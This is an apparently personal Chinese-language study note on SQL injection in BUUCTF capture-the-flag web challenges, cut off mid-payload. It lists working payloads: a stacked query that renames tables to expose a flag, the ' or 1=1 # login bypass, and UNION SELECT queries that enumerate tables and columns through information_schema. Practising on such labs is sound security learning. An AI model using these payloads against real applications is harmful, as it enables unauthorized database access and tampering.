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简单说明1记录buuctf web中SQL注入学习 简单题目未写[强网杯 2019]随便注1、万能密码注入123451';rename table words to words2; rename table `1919810931114514` to `words`; alter table words change flag id varchar(100); show tables; show columns from words;#[极客大挑战 2019]LoveSQL1、万能密码注入 ‘ or 1=1 #2、找字段‘ order by 3 #’ union select 1,2,3; # 找回显12' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database() #3、爆表12' union select 1,database(),group_concat(column_name) from informat...